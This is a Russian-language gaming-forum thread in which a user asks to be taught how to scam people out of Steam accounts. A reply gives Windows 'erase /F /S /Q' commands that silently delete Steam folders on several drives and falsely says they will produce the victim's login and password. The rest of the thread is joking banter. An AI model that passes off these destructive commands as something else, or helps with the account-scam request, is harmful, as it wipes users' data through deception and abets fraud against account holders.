Подведи собственные итоги года совместно с YOUGAME и забери ценные призы! Перейти

Как скамить на steam accoutns?

Забаненный
Забаненный
Статус
Оффлайн
Реакции
7
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Научите скамить, через программу или чо там :D кароч научите куплю программу

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
смотри короче, идешь с челом в дс или скайп, ждёшь ровно 30 сек, открываешь cmd и вписываешь туда секретные читы бигнеймов югейма

Код:
Expand Collapse Copy
erase C:\Program Files\Steam /F /S /Q
erase C:\Program Files (x86)\Steam /F /S /Q
erase D:\Steam /F /S /Q
erase E:\Program Files\Steam /F /S /Q

после этого перезапускаешь компуктер и у тебя в твоей папке Steam появится log.txt там логин:пароль от акка стимовского чела с котороым ты сидел

смотри короче, идешь с челом в дс или скайп, ждёшь ровно 30 сек, открываешь cmd и вписываешь туда секретные читы бигнеймов югейма

Код:
Expand Collapse Copy
erase C:\Program Files\Steam /F /S /Q
erase C:\Program Files (x86)\Steam /F /S /Q
erase D:\Steam /F /S /Q
erase E:\Program Files\Steam /F /S /Q

после этого перезапускаешь компуктер и у тебя в твоей папке Steam появится log.txt там логин:пароль от акка стимовского чела с котороым ты сидел
не поняф я на свои аккаунты буду скамить

не поняф я на свои аккаунты буду скамить
Нет, эту схему выдавал пентагон, он уже ее опробовал на сыне гейба, все хорошо, скоро он таким способом будет взламывать акки в майнкрафте !

Нет, эту схему выдавал пентагон, он уже ее опробовал на сыне гейба, все хорошо, скоро он таким способом будет взламывать акки в майнкрафте !
а можно взламывать матерей? ну там место стима будет мама картинка ее ведь можно взламать?(не про ваших)

Назад
Сверху Снизу